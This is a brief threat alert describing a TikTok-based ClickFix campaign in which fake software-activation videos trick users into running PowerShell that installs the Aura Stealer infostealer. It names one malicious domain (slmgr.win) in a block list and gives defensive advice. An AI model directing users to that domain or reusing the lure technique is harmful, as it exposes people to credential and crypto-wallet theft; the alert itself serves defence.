TikTok-Hosted ClickFix Campaign Spreads Aura Stealer Malware
Category:Threat Alerts / Malware & Campaigns
Cybercriminals use TikTok to distribute the Aura Stealer malware via PowerShell-based ClickFix attacks disguised as activation tutorials for Windows and Adobe products. Source: BleepingComputer.
CORTEX Protocol Intelligence Assessment
Business Impact: Credential theft and session hijacking via social platforms. Technical Context: PowerShell scripts connect to Cloudflare-hosted payloads stealing browser and crypto credentials.
Strategic Intelligence Guidance
- Block slmgr.win domain and related IoCs.
- Restrict PowerShell execution in enterprise endpoints.
- Educate users on avoiding software activation scams.
- Implement behavioral EDR for detection of PowerShell-based threats.
Vendors
Threats
Targets
Intelligence Source: TikTok videos continue to push infostealers in ClickFix attacks | Oct 20, 2025